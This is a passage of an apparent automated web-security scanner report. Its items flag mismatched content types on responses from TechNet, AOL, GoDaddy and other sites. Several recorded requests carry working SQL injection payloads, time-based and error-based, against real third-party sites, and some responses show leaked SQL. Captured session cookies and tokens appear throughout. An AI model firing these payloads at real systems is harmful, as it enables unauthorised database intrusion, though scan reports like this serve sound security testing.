X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine|en-us/library:3=en-us/subscriptions/downloads

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 21:44:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:13 GMT
Content-Length: 4956

<ul class="toc"><li name="cc440484(n)" ><img src="http://i.technet.microsoft.com/Global/Images/clear.gif" class="LibC_c"/><a href="http://technet.microsoft.com/en-us/library/cc498713.aspx" target="_to
...[SNIP]...
31.21. http://technet.microsoft.com/en-us/library/bb905490(n).aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb905490(n).aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /en-us/library/bb905490(n).aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/library/cc184906.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine|en-us/library:3=en-us/subscriptions/downloads

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sun, 27 Mar 2011 01:42:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:14 GMT
Content-Length: 2853

<ul class="toc"><li name="cc664659(n)" ><img src="http://i.technet.microsoft.com/Global/Images/clear.gif" class="LibC_c"/><a href="http://technet.microsoft.com/en-us/library/cc664659.aspx" target="_to
...[SNIP]...
31.22. http://technet.microsoft.com/en-us/library/cc440494(n).aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/cc440494(n).aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /en-us/library/cc440494(n).aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/library/cc184906.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine|en-us/library:3=en-us/subscriptions/downloads

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sun, 27 Mar 2011 01:42:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:14 GMT
Content-Length: 477

<ul class="toc"><li name="cc706990(ws.10,n)" ><img src="http://i.technet.microsoft.com/Global/Images/clear.gif" class="LibC_c"/><a href="http://technet.microsoft.com/en-us/library/cc706990(WS.10).aspx
...[SNIP]...
31.23. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:07 GMT
Expires: Thu, 31 Mar 2011 00:52:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCRBACDA=NIMGJCFBPLFKBOMEJBIEBOMJ; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
31.24. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc08.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1140
Content-Length: 1140

<div id="local-module" class="mnid-local plid-51915">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...
31.25. https://www.godaddy.com/sso/keepalive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /sso/keepalive.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /sso/keepalive.aspx?rand=73135 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Referer: https://www.godaddy.com/gdshop/hosting/landing.asp?isc=GPASH006&se=%2B&ci=415
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; GoogleADServicesgoogleadwordssearch=cjiapcjcgapjuircrfujthnakaycbjcd; BlueLithium_domainsearch=cjiapcjcgapjuircrfujthnakaycbjcd; serverVersion=A; traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:37 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
31.26. http://www.huffingtonpost.com/badge/badges_json_v2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:08 GMT
Content-Length: 7495
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_1","slice_params":{"face
...[SNIP]...
31.27. http://www.insideup.com/ppc/leadflow/hins00/project.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
31.28. http://www.insideup.com/ppc/leadflow/style/blackdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/style/blackdot.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ppc/leadflow/style/blackdot.gif HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
Referer: http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1

Response

HTTP/1.0 404 Not Found
Date: Fri, 25 Mar 2011 19:15:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/style/blackdot.gif was not found on this server.</p>
31.29. http://www.manitu.de/webhosting/home/images/homepagekosten-verfuegbarkeit.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manitu.de
Path:   /webhosting/home/images/homepagekosten-verfuegbarkeit.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /webhosting/home/images/homepagekosten-verfuegbarkeit.gif HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/home/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:35 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 10 Mar 2011 08:17:32 GMT
ETag: "800073-25fe-4d78891c"
Accept-Ranges: bytes
Content-Length: 9726
Content-Type: image/gif

.PNG
.
...IHDR.......2.....1..M....tRNS......7X.}.. .IDATx..|y...u....gz........}..H.!..A.9.....`.81........;>b........2.a.:..V.B........c.gz.....3....LH.|..o..~....zU.^..nD)....SM..4..........S..p
...[SNIP]...
31.30. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pandasecurity.com
Path:   /virus_info/exports/fecha_hora.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /virus_info/exports/fecha_hora.asp HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
Referer: http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf?idiom=2&dir=http://www.pandasecurity.com/virus_info/exports/&dirMapa=http://www.pandasecurity.com/virus_info/flash/&dircfg=http://www.pandasecurity.com/virus_info/exports/alert/&dirPaises=http://www.pandasecurity.com/virus_info/exports/&dirTitulos=http://www.pandasecurity.com/virus_info/flash/&dirTicker=http://www.pandasecurity.com/virus_info/exports/&dirlst1=http://www.pandasecurity.com/virus_info/exports/encyclopedia/&dirlst2=http://www.pandasecurity.com/virus_info/exports/encyclopedia/virus/&acercade=http://www.pandasecurity.com/homeusers/security-info/gtw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 35
Cache-Control: no-cache
